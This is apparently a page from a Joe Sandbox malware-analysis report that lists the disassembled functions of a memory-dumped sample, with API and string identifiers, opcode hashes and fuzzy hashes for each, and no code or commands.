                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _free_nolock_mbsncpy_s
                                                      • String ID: no field package.preload['%s']$'package.preload' must be a table$luaJIT_BC_%s$preload
                                                      • API String ID: 1937151238-4005544233
                                                      • Opcode ID: ae728f4becdb446dc012175d8b8f057be525cdf9ebc50b6f98fe9e2db2f7ebdd
                                                      • Instruction ID: 03e133a081923ad844d766e1460e8ec3cf095259369042d61b975994b80a70bb
                                                      • Opcode Fuzzy Hash: ae728f4becdb446dc012175d8b8f057be525cdf9ebc50b6f98fe9e2db2f7ebdd
                                                      • Instruction Fuzzy Hash: EF217169958A8291F720BB65E8431AAE350FBC43E0F801372F9AD477E9CE6CD4019B10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF2AD68 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: CorExitProcess$mscoree.dll
                                                      • API String ID: 4061214504-1276376045
                                                      • Opcode ID: 2d3564b58b9cb606e05f0e38798506940211f3724d7b41a856236d5833a03c23
                                                      • Instruction ID: f85c4b63a3fb9385d7dd6554be9ab52be0f2ff5f291324e22460022a944f5b8b
                                                      • Opcode Fuzzy Hash: 2d3564b58b9cb606e05f0e38798506940211f3724d7b41a856236d5833a03c23
                                                      • Instruction Fuzzy Hash: 4FF0BEA9B18B47A1FF447B20E482375A360EF88781FC014B9D44F46664CF2CE288D320
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF3CDE4 Relevance: 7.7, APIs: 5, Instructions: 202COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF73AF3CE26
                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF73AF3CDA3,?,?,FFFFFFFE,00007FF73AF3D196), ref: 00007FF73AF3CEE4
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF73AF3CDA3,?,?,FFFFFFFE,00007FF73AF3D196), ref: 00007FF73AF3CF6E
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 2210144848-0
                                                      • Opcode ID: d1febf673d703c9a692e54b83532147798bcc06cb3c06aafb1355438f7c6e3e3
                                                      • Instruction ID: cdfac7c229034fe0b955fb644219cbd13fb5b769779a655b5025d3979d29d74b
                                                      • Opcode Fuzzy Hash: d1febf673d703c9a692e54b83532147798bcc06cb3c06aafb1355438f7c6e3e3
                                                      • Instruction Fuzzy Hash: 0D81926AF18613A9FB10BB6584466BCE661AF44B88FC40271DE0E536D5DF3EE446E330
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF3FCD8 Relevance: 7.7, APIs: 5, Instructions: 158COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _set_statfp
                                                      • String ID:
                                                      • API String ID: 1156100317-0
                                                      • Opcode ID: 799261281b30a15e4dafbe70f8b889fd4baea56ba5803dfc389231a0df8f540d
                                                      • Instruction ID: b3a675cc54dd7df8f1384b0cd8905e690bd189ae8887cc153926f10618d5d32a
                                                      • Opcode Fuzzy Hash: 799261281b30a15e4dafbe70f8b889fd4baea56ba5803dfc389231a0df8f540d
                                                      • Instruction Fuzzy Hash: 5951F91ED0C987A6F722BE38980237AE250BF41394F848275E95E1E6D1DF3DE481E720
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF3F880 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _set_statfp
                                                      • String ID:
                                                      • API String ID: 1156100317-0
                                                      • Opcode ID: 12683ee949a498a76d615f5c80dca171e6a4e98699c78b4ade9d4b7d37fa3cf1
                                                      • Instruction ID: b7ef9a13abc5e4608768400ef1f0d791a8e28ee4e822d130fb05a215ccac96c2
                                                      • Opcode Fuzzy Hash: 12683ee949a498a76d615f5c80dca171e6a4e98699c78b4ade9d4b7d37fa3cf1
                                                      • Instruction Fuzzy Hash: 9811422EE18A0731F7583524E84737991406F64374FD406B6EA6F0E3D6DE5EE841A324
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AEA8A50 Relevance: 7.5, APIs: 5, Instructions: 31libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$HandleModule
                                                      • String ID:
                                                      • API String ID: 667068680-0
                                                      • Opcode ID: 5bba9cc2eff1bf7a6b9eed0e22f4533ed8bb710fbb5761d34dfbe2c1f93b6363
                                                      • Instruction ID: e3fc5f19c932ae36b90460373ac2937cb8adaff7860a19a10b28c297b98cb30b
                                                      • Opcode Fuzzy Hash: 5bba9cc2eff1bf7a6b9eed0e22f4533ed8bb710fbb5761d34dfbe2c1f93b6363
                                                      • Instruction Fuzzy Hash: 77012D7A54CE8291EB60BB14F45632BA7B0FB887C4F504175EACE42668CF3CD654DB14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF3D7F8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 212COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                      • API String ID: 3215553584-1196891531
                                                      • Opcode ID: 62cfa22d59addd589a4e3312643b63144ee0171c148e141a576d728c4f9faa20
                                                      • Instruction ID: 86ffc4b34562b17e9305b6fdaa195a99746666cd53b54fda7d3607b6b3a7902c
                                                      • Opcode Fuzzy Hash: 62cfa22d59addd589a4e3312643b63144ee0171c148e141a576d728c4f9faa20
                                                      • Instruction Fuzzy Hash: DF81E67AD0D247A5FB657E288246238EB909F02748FD45AB5C90E475D5EA3FE801B322
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF15C3C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID: $*
                                                      • API String ID: 3215553584-3982473090
                                                      • Opcode ID: 0f06c74284d486cf50fce8b43e04ae6d09846b976987c370e94c47f60e81af7a
                                                      • Instruction ID: b7977754b320cab53579e29e4261446ad9e469df9e44b5e0f694dce1d6dec76d
                                                      • Opcode Fuzzy Hash: 0f06c74284d486cf50fce8b43e04ae6d09846b976987c370e94c47f60e81af7a
                                                      • Instruction Fuzzy Hash: 3B819D7AD0C207A6FBA4BF29805647CF7A0EB01B58FD400B5CA4947394DF39E841EB25
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF14E50 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID: $*
                                                      • API String ID: 3215553584-3982473090
                                                      • Opcode ID: 1efd0dc201afb6cb2df87b51b1532de0c6c955aa486bde14bcc7542939fd6564
                                                      • Instruction ID: 1800bbd83905c09d9a49097eda78fd203c886a3fcfd567f7fb613462d20d14cd
                                                      • Opcode Fuzzy Hash: 1efd0dc201afb6cb2df87b51b1532de0c6c955aa486bde14bcc7542939fd6564
                                                      • Instruction Fuzzy Hash: 4581B2BA80C643A6FB64AF65804617CFBA0EB52B44F9401B5CA4D47385CF3DE481E7B5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF163E8 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID: $*
                                                      • API String ID: 3215553584-3982473090
                                                      • Opcode ID: aebac3cd1a26833e2af55c486e265236ad524e294da917c66b7e0629587f9230
                                                      • Instruction ID: 40660b059b51744b1258c3f3189d937d9cf53f4b5031f094574c759f746d19d3
                                                      • Opcode Fuzzy Hash: aebac3cd1a26833e2af55c486e265236ad524e294da917c66b7e0629587f9230
                                                      • Instruction Fuzzy Hash: 8D819F7A908203A6FBE4BF298057078B7A4EB10B48FD440B5CA494B298DF3DE445EB34
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF1551C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 186COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID: $*
                                                      • API String ID: 3215553584-3982473090
                                                      • Opcode ID: 1b04caf276477af04b5d885976e20d85ac384d2c75b85c1de0808b5f727b4059
                                                      • Instruction ID: 6db3a933cfe73900aee0509521be3f2aba63a4057b31e6a6e1aff846815bc1ab
                                                      • Opcode Fuzzy Hash: 1b04caf276477af04b5d885976e20d85ac384d2c75b85c1de0808b5f727b4059
                                                      • Instruction Fuzzy Hash: 8881857A90C24BDAFB64AF25814707CBBE1EB01B88F9401B5CA4946395CF3DE441EB31
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF2F800 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 177COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _set_statfp
                                                      • String ID: "$sinh
                                                      • API String ID: 1156100317-1232919748
                                                      • Opcode ID: d4441f1067829586646d6e403ae08bbbbe116838e7bd38d72df8aa425cad948a
                                                      • Instruction ID: b77a58d94786cd32ce241769c75c0cb994d837e935628551f1c6ee6f266c9f48
                                                      • Opcode Fuzzy Hash: d4441f1067829586646d6e403ae08bbbbe116838e7bd38d72df8aa425cad948a
                                                      • Instruction Fuzzy Hash: 5091F42AD28F8699E6739B34A0423B6F314AF5A3D5F518323E58F31A51DF2CE1439710
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF1061C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: CallEncodePointerTranslator
                                                      • String ID: MOC$RCC
                                                      • API String ID: 3544855599-2084237596
                                                      • Opcode ID: 36655cc38fdb37db5713a354792fa09f1dfbcf1d55a9f2e70b9818b2607edb59
                                                      • Instruction ID: c4b20eea5f2d203020317a2b82fc5ef4a4aaf90b1663ab00cf7a2968bec1ebe2
                                                      • Opcode Fuzzy Hash: 36655cc38fdb37db5713a354792fa09f1dfbcf1d55a9f2e70b9818b2607edb59
                                                      • Instruction Fuzzy Hash: 9F61673AA08A46DAF710EF66D0413ADB7A0FB44B98F844275EE4D17B99CB38E145C750
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF0EF34 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: Unwind__except_validate_context_record
                                                      • String ID: csm$f
                                                      • API String ID: 2208346422-629598281
                                                      • Opcode ID: d98e7a07f294c52037bc1436f4614ab14783cba3f9a043537fabdfeef2d51ec6
                                                      • Instruction ID: a19e2925c076b87adff3c025b632c448ce3bf7d0bade528b04a29b2c1126c001
                                                      • Opcode Fuzzy Hash: d98e7a07f294c52037bc1436f4614ab14783cba3f9a043537fabdfeef2d51ec6
                                                      • Instruction Fuzzy Hash: 0451C03AB09643AAFB14EB15E805A39B795FB44B98F908070DA0E43788DF79ED41E711
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF2F344 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _set_statfp
                                                      • String ID: !$acos
                                                      • API String ID: 1156100317-2870037509
                                                      • Opcode ID: bf72582c257df8192f41e73549c3bb19c3b6f1f999e55f766029dc027c0b68c3
                                                      • Instruction ID: 2b94011b533a6658a8b812bd339d6a07efa1d1e698694113fa47591a8ba16606
                                                      • Opcode Fuzzy Hash: bf72582c257df8192f41e73549c3bb19c3b6f1f999e55f766029dc027c0b68c3
                                                      • Instruction Fuzzy Hash: 8F611869C2CF4799FA27EF349452276D714AFA63D0F518372E91E31964DF2CE082A710
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF2F0B8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 125COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _set_statfp
                                                      • String ID: !$asin
                                                      • API String ID: 1156100317-2188059690
                                                      • Opcode ID: 9e38084c10780cd626a2090b3a56498ae94656eafe0a602bef55e7ad367d1a5b
                                                      • Instruction ID: e72f93b0eeff52adf35cfd0297136fd9068da3169f579324e161a8d4a852812f
                                                      • Opcode Fuzzy Hash: 9e38084c10780cd626a2090b3a56498ae94656eafe0a602bef55e7ad367d1a5b
                                                      • Instruction Fuzzy Hash: EF512B69C3CF4795F617EB349852276D314BFA6380F918376E92E35A60CF2CE082A710
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AEA8C80 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 105COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
